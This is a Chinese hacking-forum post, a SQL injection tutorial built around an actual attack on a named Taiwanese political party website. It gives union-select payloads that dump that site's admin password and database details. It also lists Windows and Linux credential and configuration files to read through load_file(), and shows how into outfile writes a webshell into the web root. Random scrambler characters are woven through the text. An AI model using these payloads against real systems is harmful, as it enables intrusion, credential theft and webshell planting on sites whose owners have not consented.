中国网络渗透测试联盟
标题:
我的mysql注入代码
[打印本页]
作者:
admin
时间:
2012-9-13 16:41
标题:
我的mysql注入代码
MYSQL常用注入代码
" B3 E4 Z4 I8 X. \3 t. L
2 Z. m0 A- |8 J2 z* [9 }! f v2 ]
and (select count(*) from mysql.user)>0/* 判断读取权限
+ w" H9 ~: q5 X* r! @ P# G) S4 k
* ~" U. A; P$ r2 y* Q! m
union select 1,concat_ws(0x3a,username,password),3,4 猜解用户名和密码
# B! x3 ~) J0 G5 j9 a/ G
. _. ] F; L+ f* M4 h9 a
- ]5 M$ z# { ]( ~% [
, P; x- k5 A. K& D, { Y
6 `- P# g( U, a2 ?8 R: D
信息来源:九零后安全技术小组|90 Security Team
- Q- b0 |0 u" L
8 Q4 B! z* c" G u }
(
http://www.90team.net
)转载请注明出处。
, s' A* f5 V' M" ~3 \$ }
2 R6 P! n- e" Y
6 k! W$ N: @& M6 v+ L/ P" ^1 z- N
: T0 ]' N% V0 ^
0 q& t/ z; X. J! `8 ?) A0 U
知道了字段长度后我们用union select联合查询来列出所有字段
) s" ]9 c* \$ U; n
% t1 s6 e& H$ t }
http://www.dpp.org.tw/news_conte
... menu=44&sn=3575 union select 1,2,3,4,5,6,7,8,9,10,11/** //这里我们列出了11个字段,并且以/*结束符告诉MYSQL,命执行完毕。
% H) z. r; ~6 t3 w/ b3 E5 {
! n$ m( h( s' l" ]
这里返回 3/11 4 这几个字段
" T# g: M8 Z- Q& Y! o; f7 B
5 P3 J; O {/ x
列出字段后就可以在回显的相应的字段上,替换你要查询的字段名,再from表名.就可以暴出相应的字段内容,这里我们用passwd替换 4 这个字段
. H8 {" q7 A- N
) ~; [! E; c2 p' Z* k) v
如:
& c0 _4 \6 {0 {$ o3 v4 Z8 P5 Z
: i7 l3 ?0 B7 Y
http://www.dpp.org.tw/news_conte
... menu=44&sn=3575 and 1=2 union select 1,2,3,passw,5,6,7,8,9,10,11 from admin/*
' J# o+ E2 ]6 `
# w1 v& Y; h( N: A$ W
这里返回密码641223,因为小波入侵过,所以事先知道了用户名,到这里就成功得到后台的管理密码。但是上次被黑之后管理员把后台改掉了,无法通过GOOGLE搜索到,我也没猜出来,所以后台登陆上传拿SHELL的方法就断了。
& R$ D* r( U) `+ p C
下面简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
3 Y" t' w2 l; ~; \
* |+ f/ Q' s* F; t+ Y% n; O
1:system_user() 系统用户名
4 M4 \% d0 ~- i+ O! l7 S
2:user() 用户名
7 {8 ]# \$ U9 `0 ?; Y
3:current_user 当前用户名
" D# h6 _" A6 q/ c& h/ m
4:session_user()连接数据库的用户名
' y$ D3 x2 Y# B1 \( V T% |, m
5:database() 数据库名
+ W/ b% N) o$ f
6:version() MYSQL数据库版本
, V2 K& [% y/ c# l3 K% Z/ g
7:load_file() MYSQL读取本地文件的函数
8 E/ X( p/ J) | H
8
@datadir 读取数据库路径
3 H5 k8 H5 K9 u3 L2 P2 ]4 @
9
@basedir MYSQL 安装路径
( m4 W* H0 c0 g4 O! K) v
10
@version_compile_os 操作系统
1 @. ~; u& G4 f. j7 x
. k, \+ C* c G! O$ `
利用的方法如下:
- u4 N: k) M; K$ M% c! E
/ Y3 B9 @5 O; \$ o& g) k. a0 E
在刚才返回的字段3上替换上database()函数,4上替换上system_user()函数,11上替换session_user()函数。
! _, W# t8 D' K( H
1 L' t5 r0 |2 Q& a) Z' O+ `
http://www.dpp.org.tw/news_conte
... menu=44&sn=3575 union select 1,2,database(),system_user(),5,6,7,8,9,10,session_user()/**
3 i: {8 N" v* S& D+ f1 G; z! E
: \+ L L, D7 w
执行后字段 3,4,11 分别返回 数据库名:dpp 系统用户名:dpp@localhost 连接数据库用户名:dpp@localhost
; q4 K' ^, p% y3 C8 x3 N0 y7 C/ A3 n
! J/ Y; ?6 L5 H" C$ E2 y0 F
http://www.dpp.org.tw/news_conte
... menu=44&sn=3575 union select 1,2,3,version(),5,6,7,8,9,10,7/*
2 G4 ]* ^/ ]1 b* c0 n' |2 z0 X; Y
+ U/ m, K4 \, T& W
返回当前MYSQL数据库版本 5.0.51a ,(5.0以上都支持UNION联合查询)
8 p& M$ L5 f7 R* P$ @' x
! w. Y4 L( k8 i% n5 k9 W% J2 N
这样的方法有点麻烦,我们可以用下面的语句只需要替换一个字段就能返回我们上一步列出的的三个函数。
4 G! F) ~% g2 `6 n& h: }
) C. @/ _# ~7 s# k
下面我们将语句替换到字段4 , 语句:CONCAT_WS(CHAR(32,58,32),user(),database(),version())
( J; P8 E! `' l
: R: M) `) b* D W2 f, S
http://www.dpp.org.tw/news_conte
... menu=44&sn=3575 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,7/*
+ |- R- o2 i; ~4 \5 F: G9 S5 u% n
$ H9 f! u( c8 H) a! _7 L# N
然后在字段4分别返回 用户名 数据库名 MYSQL版本号 并以冒号“:”隔开。
% R: l( L6 z+ H C5 m
8 Z6 K# u3 s$ u0 v; o
在这里大家可以举一反三,可以分别在字段3,4,11分别插入语句一次性暴出信息。
$ G& E" S8 H& L( \$ K
3 f) [$ l, T$ y# a, q, v" r3 D
OK 收集到N多信息了,我们试试当前数据库用户的权限如何,以便利用 load_file() 这个强大的函数读取敏感文件内容。(小波入侵成功的关键就是利用load_file()读取了数据库文件得到数据库密码)
* a1 A; B% C* @9 v t( V
( Q3 B7 I2 x6 M2 q9 w, ~
在注入点后面加上语句:and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。
" ~/ X6 I: l" q2 P* ^
我们执行
: e" x" m! ?7 g9 k! U) G5 H/ S
http://www.dpp.org.tw/news_conte
... menu=44&sn=3575 and (select count(*) from mysql.user)>0/*
- }; ]: O0 e( l o3 r$ b
返回错误,应该是网站被黑后管理员给数据库帐户降权了。所以我们也就不能在通过load_file()函数读取敏文件了。这条路也断了,后来我通过猜解 Fckeditor编辑器路径找到几个上传的页面上传文件。但都因为权限问题无法写入,不过在查找目录的过程中无意发现了某牛人留下的WEBSHELL。不过需要验证所以对我来说也没用。至此整个入侵失败了。
$ J, T- Y/ Y' M7 F8 U- R% a8 E) B7 Y7 n
到这里文章还没结束哦
# L- f! d, G5 r7 J, }- I6 d D6 E
7 [+ g. u* Z5 V9 d3 l% e. m
下一步介绍load_file()函数和into outfile的高级应用与技巧。(上面的入侵已经失败,所以下面说的都是假设的环境,也就是说当前的数据库用户拥有root最高权限,可以读写文件..)
. N: M; I& h! j6 y: z
load_file函数是MYSQL用来读取本地文件时用到的函数,但我们得到一个具有读写权限的数据库用户时,我们就可以用load_file函数读取系统的敏感文件,如数据库连接文件(获得数据库连接信息,连接帐户密码),系统配置文件,从而进一步收集信息并分析,渗透。
6 k/ p. u5 @* h) a/ I+ F! K
2 c: O! j$ _! D! { Z
下面先列出一些网络上收集的文件列表
8 B) }6 `7 x) M8 u' y5 O
' ~3 `/ r |: U. t' }# A ~
WINDOWS下:
7 ~9 a! P; h1 m q9 b9 ?
c:/boot.ini //查看系统版本
3 \! C4 g9 a1 {" i
c:/windows/php.ini //php配置信息
) j R+ {( e6 z5 J
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
8 ]' _5 W d" E- d) d' v! a5 ~
c:/winnt/php.ini
' m8 P7 V5 M& Y
c:/winnt/my.ini
8 N, y' A1 A/ b9 l
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
" H+ U# Q- t7 _3 E3 t" w
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
+ ]- I- v! V1 g& N7 ?* L8 g
c:\Program Files\Serv-U\ServUDaemon.ini
; z7 t2 d7 e5 {5 e: [. w; o( U
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
( e T4 x0 h3 `% v" ]- Z
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
- g- y* a1 U) t, F* D
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
0 o g. \4 w7 A$ W
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
7 U( |: Z& G* x, Y9 E
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
/ ^$ \, w4 C2 u Y9 F/ J
//存储了pcAnywhere的登陆密码
- h1 L/ [( p) S7 C
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看 WINDOWS系统apache文件
1 H1 E1 `. a9 V# \
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
3 _* k4 v$ K6 W S# Z. l, t
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
: e; w) U6 `" m) [: \
d:\APACHE\Apache2\conf\httpd.conf
3 S4 P9 T/ B- r' W' R9 B
C:\Program Files\mysql\my.ini
2 T' K) B8 f$ \5 ?9 R' f. [: x
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
( b: w: }5 n7 U# t2 F4 D
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
8 r1 k2 z. K2 m* A9 a# p
! B5 d* t) s t
, K- X0 N- B9 e, a6 S; }, _
LUNIX/UNIX下:
! g5 X2 E1 L/ O9 R3 G
2 n. `6 U/ s" _& X: J( K
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
% i& Y0 `% ?4 D) E: B* Y( s1 g8 i
/usr/local/apache2/conf/httpd.conf
* N! ^- h; x m& v9 x4 o: v
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
0 H1 |# w" t4 e' L
/usr/local/app/php5/lib/php.ini //PHP相关设置
( U$ f# L, o# ]
/etc/sysconfig/iptables //从中得到防火墙规则策略
; v. T& \7 _+ }8 o" R; _
/etc/httpd/conf/httpd.conf // apache配置文件
* F# b$ W* t/ Z0 k7 n& ^* J( N
/etc/rsyncd.conf //同步程序配置文件
( z! ~5 Q5 r9 @* n" G( M
/etc/my.cnf //mysql的配置文件
0 y" u8 Q, Z8 @+ ]
/etc/redhat-release //系统版本
6 z$ h6 ~: L& h
/etc/issue
' v8 \' n. y" L% n0 l7 [) @# l
/etc/issue.net
" |+ _1 d& U$ Q( J& ]: e
/usr/local/app/php5/lib/php.ini //PHP相关设置
; F% x5 `9 U# c1 T$ _
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
3 D$ e3 @, B1 U$ l% V. O, j' h
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
# P1 S% _8 I5 L1 L1 v
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
E Y: V% N5 G* k' d% j
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
5 h) W! u, S' _7 X
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
$ U9 S0 r% J0 {& w( ~" |
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/ M/ c! q! L1 I2 n& X; L: v
/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
o# V! k9 s0 V' y+ H. J- ?
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
3 E6 Z# H2 a$ q+ C
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
5 n2 U) D$ S# T$ \; S) A
/etc/sysconfig/iptables 查看防火墙策略
, @# o5 p, }0 G+ j$ }
! u" C' N \$ P, c
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
! @+ H G. L: p: n9 |( d
$ l M8 i7 X8 z! H8 q& h
replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
& p8 W! Y6 b0 R! |
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
8 E% i$ N* z7 Y; v. b+ M1 Z# f6 {
2 w; W. Q, S+ n, e/ Q- M
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 "<" 替换成"空格" 返回的是网页.而无法查看到代码.
: e O% h4 l' j9 x) ^& I! \
/ J3 Z% z: h9 l6 r
※load_file()函数的应用。
1 @/ [; ^3 [6 K( G# ^* [: i
& [- t9 U! U5 ^5 Y
使用时先将要读取的路径转换为16进制或10进制再替换到前面返回的字段
( ~( C L5 J8 T: f
例如替换的到字段4 :
4 N% D( m, f* t& U5 ~
! H1 d* a" K0 L9 @2 m3 p
http://www.123.com/123.php?id=123
union select 1,2,3,load_file(c:\boot.ini),5,6,7,8,9,10,7/*load_file(c:\boot.ini) 这里的写法是错误的,因为没有将路径转换。
9 D' C! y( W' A7 A& v: \
/ |5 F8 B4 l9 a6 _' B
- _1 d* ~6 G0 j: ~6 N
下面的写法才是正确的
6 J5 }% S. f; s6 i w
9 r. R0 ~" b( f
转成16进制
5 A1 i" Z: n. K* G; k
http://www.123.com/123.php?id=123
union select 1,2,3,load_file(0x633A5C626F6F742E696E69),5,6,7,8,9,10,7/*
1 j) T3 [3 E) R7 F
! n: v" a4 n0 L( L6 b$ u! n+ W
或10进制
4 g& E: E7 x! g8 _+ A5 p' Z
A. e" [$ F5 U+ ]+ C2 K$ {
http://www.123.com/123.php?id=123
union select 1,2,3,load_file(char(99,58,92,98,111,111,116,46,105,110,105)),5,6,7,8,9,10,7/*
0 `7 w! ?) @: E1 O+ W2 m; n5 {; g
4 Z/ J6 V$ K! x' J; d
说明:使用load_file()函数读取时,不能直接这样执行 load_file(c:\boot.ini) ,如果这样执行是无法回显,所以只能把路径转为16进制,直接提交数据库或把路径转为10进制,用char()函数还原回ASCII。
" q( O S% s1 b2 f& J V: l: r
例如:
" L8 e/ C5 A: T0 B1 \: _
将c:\boot.ini,转换为16进制就是:"0x633A5C626F6F742E696E69",使用就是将 load_file(0x633A5C626F6F742E696E69)替换到前面返回的字段。就能读取出c:\boot.ini的内容(当然前提是系统在C盘下)
& m, H W! h9 e1 c6 g( `
将c:\boot.ini转换为10进制是:"99 58 92 98 111 111 116 46 105 110 105"。需要使用char()来转换,转换前在记事本里把这段10进制代码之间的空格用“ ,”替换(注意英文状态下的逗号), 即:load_file(char(99,58,92,98,111,111,116,46,105,110,105))。注意不要少了扩号。
& H3 P( u+ F- I/ c$ Q2 r
; a2 Z7 o% c2 ]% o
% e D* E6 J6 s: n
※into outfile的高级应用
3 e; u5 l- _$ [3 [- {8 k8 j; C b
* M6 D! z& t* ^. d$ Z' A
要使用into outfile将一句话代码写到web目录取得WEBSHELL
' U2 A' |. ~$ T3 C; K7 ~9 Q; R
需要满足3大先天条件
( x+ `8 p8 j6 n2 Q; r
1.知道物理路径(into outfile '物理路径') 这样才能写对目录
& y) n, E% T c0 J( j0 T0 n8 k" \/ N
`/ G8 L3 X3 q2 q- Q# w8 t
2.能够使用union (也就是说需要MYSQL3以上的版本)
, `3 d# |4 i' O. d" X# @# V
+ k: ]! c" g* O, k* I/ t
3.对方没有对’进行过滤(因为outfile 后面的 '' 不可以用其他函数代替转换)
3 `# z/ z6 Y1 _% o4 ]$ I
: m; j# W4 i k. [
4就是MYSQL 用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出)
1 O8 h, f* \" w, i
6 e* O9 k3 ^, A9 b. P8 a
5.windows系统下一般都有读写权限,LINUX/UNIX下一般都是rwxr-xr-x 也就是说组跟其他用户都没有权限写入操作。
" p6 O! k1 T0 T
4 Q: q5 h# j& p# G/ t" K
但环境满足以上条件那么我们可以写一句话代码进去。
, J, U; R# F/ s5 F2 f1 [
例如:
* Y6 a- T% r& Y/ W$ E4 X
http://www.123.com/123.php?id=123
union select 1,2,3,char(这里写入你转换成10进制或16进制的一句话木马代码),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*
6 q5 d9 \5 u& l4 }* t
5 g6 k! l4 x% o+ s& @
$ g+ `* Y2 f9 z H
2 h% X3 C) K, ]6 b {
还有一个办法是假如网站可以上传图片,可以将木马改成图片的格式上传,找出图片的绝对路径在通过into outfile导出为PHP文件。
6 V! d: y2 {( k2 `7 L7 t( |/ O
0 D, Q# y/ C% R5 d5 |2 D4 e' P" [
代码:
! \9 V9 v6 t3 B: o" s4 P0 Q' a" S
http://www.123.com/123.php?id=123
union select 1,2,3,load_file(d:\web\logo123.jpg),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*
& C. b, y4 {) Y6 ?7 A
' u f7 S( j9 m
d:\web\90team.php 是网站绝对路径。
! I! [! o* F9 j1 c% G% q
0 c$ O- @! s+ t7 Y
! {- E4 F4 q- }* M
好了,到此为止篇文章已经写完了,文章有纰漏或者错误的地方还望大家谅解指出。
' M. R& j( _- E" ~* C
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2